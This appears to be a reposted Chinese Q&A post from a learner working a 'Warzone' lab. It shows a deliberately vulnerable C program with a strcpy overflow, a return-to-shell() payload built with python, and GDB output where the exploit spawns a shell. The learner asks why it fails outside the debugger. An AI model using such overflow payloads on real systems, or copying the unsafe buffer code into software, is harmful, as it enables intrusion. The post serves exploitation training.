逆向工程 - 我怎样才能让我的 shellcode 在 GDB 之外工作？ - 吾爱随笔录

我在没有 ALSR 或 NX 位的 Warzone VM 中工作。我试图利用的程序非常简单：

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2B.c -o lab2B
 */

char* exec_string = "/bin/sh";

void shell(char* cmd)
{
    system(cmd);
}

void print_name(char* input)
{
    char buf[15];
    strcpy(buf, input);
    printf("Hello %s\n", buf);
}

int main(int argc, char** argv)
{
    if(argc != 2)
    {
        printf("usage:\n%s string\n", argv[0]);
        return EXIT_FAILURE;
    }

    print_name(argv[1]);

    return EXIT_SUCCESS;
}

我能够让它在 GDB 中工作（我认为）：

lab2B@warzone:/levels/lab02$ gdb --args lab2B $(python -c "print 'A' * 27 + '\xbd\x86\x04\x08' + 'BBBB' + '\x28\xa0\x04\x08'")
Reading symbols from lab2B...(no debugging symbols found)...done.
gdb-peda$ disas shell
Dump of assembler code for function shell:
   0x080486bd <+0>: push   ebp
   0x080486be <+1>: mov    ebp,esp
   0x080486c0 <+3>: sub    esp,0x18
   0x080486c3 <+6>: mov    eax,DWORD PTR [ebp+0x8]
   0x080486c6 <+9>: mov    DWORD PTR [esp],eax
   0x080486c9 <+12>:    call   0x8048590 <system@plt>
   0x080486ce <+17>:    leave
   0x080486cf <+18>:    ret
End of assembler dump.
gdb-peda$ b *0x080486c9
Breakpoint 1 at 0x80486c9
gdb-peda$ r
Starting program: /levels/lab02/lab2B AAAAAAAAAAAAAAAAAAAAAAAAAAA�BBBB\(�
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAA�BBBB(�
[----------------------------------registers-----------------------------------]
EAX: 0x804a028 --> 0x80487d0 ("/bin/sh")
EBX: 0xb7fcd000 --> 0x1a9da8
ECX: 0x0
EDX: 0xb7fce898 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xbffff66c ("AAAABBBB(\240\004\b")
ESP: 0xbffff654 --> 0x804a028 --> 0x80487d0 ("/bin/sh")
EIP: 0x80486c9 (<shell+12>: call   0x8048590 <system@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80486c0 <shell+3>: sub    esp,0x18
   0x80486c3 <shell+6>: mov    eax,DWORD PTR [ebp+0x8]
   0x80486c6 <shell+9>: mov    DWORD PTR [esp],eax
=> 0x80486c9 <shell+12>:    call   0x8048590 <system@plt>
   0x80486ce <shell+17>:    leave
   0x80486cf <shell+18>:    ret
   0x80486d0 <print_name>:  push   ebp
   0x80486d1 <print_name+1>:    mov    ebp,esp
Guessed arguments:
arg[0]: 0x804a028 --> 0x80487d0 ("/bin/sh")
[------------------------------------stack-------------------------------------]
0000| 0xbffff654 --> 0x804a028 --> 0x80487d0 ("/bin/sh")
0004| 0xbffff658 ('A' <repeats 24 times>, "BBBB(\240\004\b")
0008| 0xbffff65c ('A' <repeats 20 times>, "BBBB(\240\004\b")
0012| 0xbffff660 ('A' <repeats 16 times>, "BBBB(\240\004\b")
0016| 0xbffff664 ('A' <repeats 12 times>, "BBBB(\240\004\b")
0020| 0xbffff668 ("AAAAAAAABBBB(\240\004\b")
0024| 0xbffff66c ("AAAABBBB(\240\004\b")
0028| 0xbffff670 ("BBBB(\240\004\b")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080486c9 in shell ()
gdb-peda$ c
Continuing.
[New process 2068]
Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.19.so...done.
Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/ld-2.19.so...done.
process 2068 is executing new program: /bin/dash
Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/ld-2.19.so...done.
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x80486c9

但似乎外壳不会在 GDB 之外打开：

lab2B@warzone:/levels/lab02$ ./lab2B $(python -c "print 'A' * 27 + '\xbd\x86\x04\x08' + 'BBBB' + '\x28\xa0\x04\x08'")
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAA�BBBB(�
sh: 1: : not found
Segmentation fault (core dumped)

由于不同的环境（？），我认为这是某种堆栈填充问题，但它似乎确实在调用sh某些容量。我可以使用什么样的工具来调试 GDB 之外的此类问题？如果工具没有帮助，是否有任何类型的阅读可以帮助我更好地了解正在发生的事情？谢谢！